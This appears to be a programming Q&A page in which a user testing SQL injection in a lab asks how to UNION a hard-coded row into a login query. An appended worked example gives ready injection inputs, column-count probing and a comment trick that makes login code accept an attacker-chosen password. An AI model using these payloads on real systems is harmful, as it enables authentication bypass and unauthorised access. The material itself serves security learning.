
I'm testing SQL injection in my lab and need to combine two SQL queries using UNION to bypass authentication, so I would like to know if there is a way to set static values in the second query, so that my Java code will only check for the user password I send as a static password. The SQL query should be like this:

 SELECT * FROM users WHERE user = 'user1' UNION SELECT user AS 
 user1, password AS password FROM users ;'

My Java code reports an error:

 You have an error in your SQL syntax; check the manual that 
 corresponds to your MySQL server version for the right syntax to 
 use near
  • Remove the semicolon? Commented Dec 19, 2018 at 20:04

2 Answers


First, eliminate the use of SELECT * to make sure both queries return the same number of columns. Then you can hard code your static values in the second query.

SELECT user, password
    FROM users
    WHERE user =  'user1'
UNION
SELECT 'user', 'password';

2 Comments

Theoretically I have no control over the first query so I can't change it; in this case I think I can add NULL values to match the first query's size. ` SELECT * FROM users WHERE user = 'user1' UNION SELECT 'user', 'password', 'Null', 'null'; `
@AzizAzizos Yes, you can add NULLs to the second query to match the number of columns returned by the first, but do not enclose them in single quotes. If you do, you'll get the literal string 'NULL' instead of a true NULL value.

Using UNION, you must select the corresponding number and type of columns, e.g.:

 SELECT user, password
 FROM users 
 WHERE user = 'user1' 
 UNION 
 SELECT 'user', 'password' 
  ;

3 Comments

Probably, the query after the UNION is the one that should be modified (that's the one injected). Anyway, I think it's a good answer.
The second query should be static (Hard coded), I don't want the code to grab anything from the database
The second query will return one row of 'user', 'password' for every row in the users table. UNION will, of course, then eliminate the duplicates, but it's still kind of silly and inefficient to do.
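Both answers above say the same thing: match the column count of the first query, then hard-code the second. The following is an added worked example (not code from the question or either answer) that walks through that in a MySQL lab. It assumes a hypothetical `users` table with four columns, built here, and assumes the application concatenates the input into `SELECT * FROM users WHERE user = '<input>'` and appends its own closing quote, which is what the stray `'` at the end of the question's query came from.

```sql
-- Added example, not part of the original question or answers.
-- Assumed lab schema (constructed here): four columns, so the injected
-- SELECT must also produce four columns.
CREATE TABLE users (
  id       INT PRIMARY KEY,
  user     VARCHAR(32) NOT NULL,
  password VARCHAR(64) NOT NULL,
  email    VARCHAR(64)
);
INSERT INTO users VALUES
  (1, 'user1', 'realsecret', 'user1@example.com'),
  (2, 'admin', 'adminpw',    'admin@example.com');

-- Step 1: discover how many columns the first (uncontrolled) query returns.
-- ORDER BY <n> fails once n exceeds the column count, so the largest n that
-- still runs is the number of columns the UNION half has to match.
SELECT * FROM users WHERE user = 'user1' ORDER BY 4;   -- runs: 4 columns
-- SELECT * FROM users WHERE user = 'user1' ORDER BY 5; -- error: unknown column '5'

-- A mismatched UNION is rejected before anything runs:
-- SELECT * FROM users WHERE user = 'user1' UNION SELECT 'user', 'password';
-- -> The used SELECT statements have a different number of columns

-- Step 2: the injected input. The application appends its own closing
-- quote (and possibly a semicolon); ending the input with a comment marker
-- (two dashes followed by a space) makes MySQL ignore that trailing quote,
-- which is what caused the syntax error reported in the question.
-- Input sent as the username:
--   user1' UNION SELECT NULL, 'attacker', 'static-pass', NULL -- 
-- Statement as MySQL sees it after the application adds its quote:
SELECT * FROM users WHERE user = 'user1'
UNION
SELECT NULL, 'attacker', 'static-pass', NULL -- '
;
-- Returns two rows: (1, user1, realsecret, ...) from the table and
-- (NULL, attacker, static-pass, NULL), which exists nowhere in the table.

-- Step 3: if the static row should be the ONLY row the application sees,
-- make the first half match nothing:
-- Input:  nobody' UNION SELECT NULL, 'attacker', 'static-pass', NULL -- 
SELECT * FROM users WHERE user = 'nobody'
UNION
SELECT NULL, 'attacker', 'static-pass', NULL -- '
;
-- Returns exactly one row whose password column is 'static-pass', so a
-- login routine that compares the submitted password against that column
-- accepts 'static-pass' without any real credential.

-- Caveat from the comments: NULL must be unquoted. 'NULL' is a 4-byte string.
SELECT NULL IS NULL AS real_null, 'NULL' IS NULL AS quoted_null;  -- 1, 0
```

The column placeholders in the injected half are NULLs rather than strings because NULL is compatible with every column type; a string literal in the `id` position would still work in MySQL but can fail on stricter engines. The only columns that need real values are the ones the application code actually reads back, here `user` and `password`.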
